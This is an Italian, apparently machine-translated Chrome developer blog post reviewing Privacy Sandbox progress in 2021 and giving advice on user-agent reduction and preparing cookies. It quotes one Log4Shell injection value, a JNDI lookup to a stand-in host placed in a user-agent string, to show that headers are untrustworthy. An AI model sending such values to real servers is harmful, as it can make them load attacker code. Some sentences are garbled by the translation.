Progressi in Privacy Sandbox (dicembre 2021)

Ti diamo il benvenuto nell'edizione conclusiva del 2021 di Progress in the Privacy Sandbox, monitoraggio dei traguardi il percorso per eliminare gradualmente i cookie di terze parti in Chrome e puntare a un web privato. Di solito, condividiamo una panoramica degli aggiornamenti a Privacy Sandbox cronologia, oltre alle notizie da progetto, ma dicembre è stato un mese tranquillo. Esamineremo invece alcuni dei le attività del 2021 e fornire alcuni potenziali risoluzioni da adottare Ora è arrivato il nuovo anno.

Processo di sviluppo di Chromium

Affinché una nuova funzionalità della piattaforma web sia disponibile in Chromium, deve passare attraverso la sviluppo aperto del progetto . Nel 2021, Il team di Privacy Sandbox ha prodotto:

🥚Intenzione di prototipazione 19
🧪Intenzione di sperimentare7
🚀Intenzione di spedizione 11
Fonte

Ogni traguardo raggiunto rappresenta anche un invito a dare il proprio contributo all'intero ecosistema web.

Un intent da prototipare è il primo checkpoint in cui invitiamo la discussione e sperimentazione iniziale. Ciò significa che una proposta sarà disponibile su GitHub, dove puoi porre una domanda creando un problema o partecipare alle discussioni e presentazioni negli standard gruppi come W3C e IETF. È qui che inizia la programmazione, il che significa che puoi aspettarti una funzionalità di prototipo da rendere disponibile per i test degli sviluppatori alla base di una funzionalità . Il feedback iniziale è fondamentale per la convalida e l'iterazione delle proposte.

L'intenzione di sperimentare è un passaggio facoltativo se vogliamo richiedere una dell'origine dati. Gli sviluppatori possono registrarsi per ottenere l'origine prova di una funzionalità e poi testala in produzione. Viene chiamato esperimento perché ci sono aspetti specifici della funzionalità che vogliamo convalidare in ambienti reali. Sviluppatori che possono testare condividi i risultati di questi test forniscono un feedback prezioso per aiutarti a iterare per far evolvere la caratteristica.

Intent to Ship (L'intenzione di spedire) è il traguardo finale che indica che una funzionalità è ora completo e pronto per la disponibilità generale. Una volta approvata, la funzionalità viene sono state fusi in una versione futura per poi passare alle versioni canary, beta e stabili. È fondamentale assicurarsi di testare i siti con Canary e Versioni beta di Chrome per rilevare e segnalare eventuali bug prima che una funzionalità raggiunga il livello Stabile.

Proposte

Ogni proposta di Privacy Sandbox ha un repository GitHub associato. R in un repository contiene una spiegazione per riassumere la funzionalità complessiva, una descrizione le specifiche per l'implementazione da parte dei browser e i contributi di dell'ecosistema web sotto forma di problemi e richieste di pull.

In 14 repository Privacy Sandbox, avevamo:

💬545Problemi creati
250Problemi chiusi
🛠️261Richieste di pull create
223Richieste di pull unite
Fonte

Il linguaggio delle esplicative e delle specifiche è spesso rivolto a un pubblico hanno già familiarità con gli standard e lo sviluppo del browser, che possono essere impegnativo, se non lo conosci. Tuttavia, lo scopo di una spiegazione è spiegare! Se alcuni punti non sono chiari o non trattati, ti invitiamo a segnalare un problema per consentirci di aggiornare e chiarire la spiegazione.

Risoluzioni

Pulizie di primavera dello user agent

Dato che stavamo contando alla rovescia per il nuovo anno, contiamo anche fino a entrambi Chrome 100 e la riduzione incrementale della stringa user agent. Questo è un buon a rivedere qualsiasi utilizzo della stringa user agent nel codice per verificare sia interessata da una di queste modifiche.

Per trovare queste aree:

  1. Cerca navigator.userAgent nel codice JavaScript o accedi ai User-Agent nel codice del server.
  2. Controlla l'analisi della stringa per ipotesi relative a una versione a 2 cifre. Per Ad esempio, un'espressione regolare che specifica \d\d o \d{2} deve essere sostituita \d+.
  3. Controlla di aver utilizzato la stringa in tutti i punti in cui ti affidi a:
    • versione della piattaforma (sistema operativo)
    • versione completa di Chrome
    • nome dispositivo mobile
  4. Questi sono i valori che in futuro verranno ridotti a stringhe fisse. Se devi accedere a questi valori, esegui la migrazione a User-Agent Client Suggerimenti.

C'è un aggiornamento di dicembre da menzionare, se stai adottando un client user agent Suggerimenti, abbiamo inviato l'opzione Intent di spedizione per consentire la delega di suggerimenti ad altri origini in HTML tramite un tag <meta>. Ad esempio:

<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">

Se sei entusiasta delle pulizie di primavera, puoi anche prendere in considerazione tutte le alternative all'uso dello user agent. Se utilizzi la stringa per rilevare dispositivi mobili, quindi verifica se è possibile sostituirli con la progettazione. Se stai controllando il nome e la versione del browser per il supporto delle funzioni, vedi se puoi usare il rilevamento delle funzionalità.

Vale sempre la pena ricordare che lo user agent, come qualsiasi altro client fornito non è garantito che siano accurati o persino forniti. La versione recente di Log4j vulnerabilità, "Log4shell" fornisce un esempio di questo rischio. Un client che imposta la stringa user agent su includi un valore come ${jndi:ldap://example.com/file} potrebbe riuscire a ottenere un sito per analizzarlo attivamente sul server.

Un'altra attività tradizionale dell'anno nuovo è assicurarsi che siano soddisfatti un buon numero di biscotti con ingredienti di qualità. Man mano che ci spostiamo il ritiro graduale dei cookie di terze parti, dovresti assicurarti di conoscere i cookie del tuo sito interessati. Il 2020 ha fornito un vantaggio in quanto necessario per contrassegnare tutti i cookie per cross-site o terze parti usa con SameSite=None.

Per tutti i cookie in cui hai impostato l'attributo SameSite su None sarà necessario aggiornamento.

Al momento ci sono tre possibili percorsi da prendere in considerazione:

  1. Se il cookie è richiesto solo in una relazione 1:1 con il sito di primo livello, e poi seguire l'avanzamento del CHIPS proposta. Dovrai quindi aggiungere Partitioned al cookie.
  2. Se il cookie viene utilizzato in più siti, ma solo su più siti possiede e gestisce, potrebbe essere candidato al ruolo di proprietà Set. Ciò richiede la definizione siti nel set e aggiungendo l'attributo SameParty al cookie.
  3. Se il cookie viene utilizzato per fornire una qualche forma di valore condiviso tra più esaminare l'insieme più ampio di Privacy Sandbox proposte di una soluzione alternativa che non fare affidamento sul monitoraggio tra siti.

Se ti senti particolarmente attento alla salute, questo è anche il momento ideale di rivedere tutto l'utilizzo dei cookie, perché abbiamo una buona ricetta per migliorare cookie proprietari.

Feedback

Man mano che continuiamo a pubblicare questi aggiornamenti mensili e procediamo nella Privacy Sandbox nel suo complesso, vogliamo assicurarci che gli sviluppatori le informazioni e l'assistenza di cui hanno bisogno. Faccelo sapere su @ChromiumDev Twitter, se possiamo migliorare in questa serie. Utilizzeremo il tuo contributo per continuare a migliorare il formato.

Consulta le Domande frequenti su Privacy Sandbox, che continuano a espandersi in base ai problemi che invii all'assistenza per gli sviluppatori un repository. Se avere domande sui test o sull'implementazione delle proposte, vieni a parlarci là.